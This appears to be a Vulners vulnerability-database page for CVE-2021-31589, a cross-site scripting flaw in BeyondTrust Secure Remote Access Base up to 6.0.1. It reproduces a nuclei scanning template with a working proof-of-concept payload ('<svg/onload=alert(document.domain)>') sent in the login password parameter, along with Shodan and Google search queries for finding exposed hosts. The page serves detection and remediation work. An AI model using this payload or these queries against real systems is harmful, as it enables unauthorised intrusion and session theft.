Lucene search
K

BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting vulnerability allowing remote attackers to inject arbitrary web script or HTML, leading to potential session hijacking, data theft, or defacement

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
BeyondTrust Remote Support 6.0 Cross Site Scripting Vulnerability
3 Jan 202200:00
zdt
ATTACKERKB
CVE-2021-31589
5 Jan 202200:00
attackerkb
Circl
CVE-2021-31589
5 Jan 202214:40
circl
CNNVD
BeyondTrust Remote Support 跨站脚本漏洞
3 Jan 202200:00
cnnvd
CNVD
BeyondTrust Remote Support Cross-Site Request Forgery Vulnerability
5 Jan 202200:00
cnvd
Check Point Advisories
BeyondTrust Secure Remote Access Base Software Cross Site Scripting (CVE-2021-31589)
7 Mar 202200:00
checkpoint_advisories
CVE
CVE-2021-31589
5 Jan 202211:26
cve
Cvelist
CVE-2021-31589
5 Jan 202211:26
cvelist
NVD
CVE-2021-31589
5 Jan 202212:15
nvd
OSV
CVE-2021-31589
5 Jan 202212:15
osv
Rows per page
id: CVE-2021-31589

info:
  name: BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting
  author: Ahmed Abou-Ela,r3Y3r53
  severity: medium
  description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement.
  remediation: |
    Upgrade to a patched version of BeyondTrust Secure Remote Access Base (6.0.2 or higher) that addresses the XSS vulnerability.
  reference:
    - https://packetstormsecurity.com/files/165408
    - https://cxsecurity.com/issue/WLB-2022010013
    - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb
    - https://www.beyondtrust.com/docs/release-notes/index.htm
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31589
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-31589
    cwe-id: CWE-79
    epss-score: 0.28307
    epss-percentile: 0.97883
    cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: beyondtrust
    product: appliance_base_software
    shodan-query: 'set-cookie: nsbase_session'
    google-query:
      - '"BeyondTrust" "Redistribution Prohibited"'
      - '"beyondtrust" "redistribution prohibited"'
  tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<svg/onload=alert(document.domain)>'
          - 'bomgar'
        case-insensitive: true
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210098f9b19f137843e138cd7296215f0798842256b613d3e2b3f70a7acadf9ca468022100de067527d5c1afc2a321991806cae5246929cd9cdba1f47c77857a3f611bae49:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.28307
27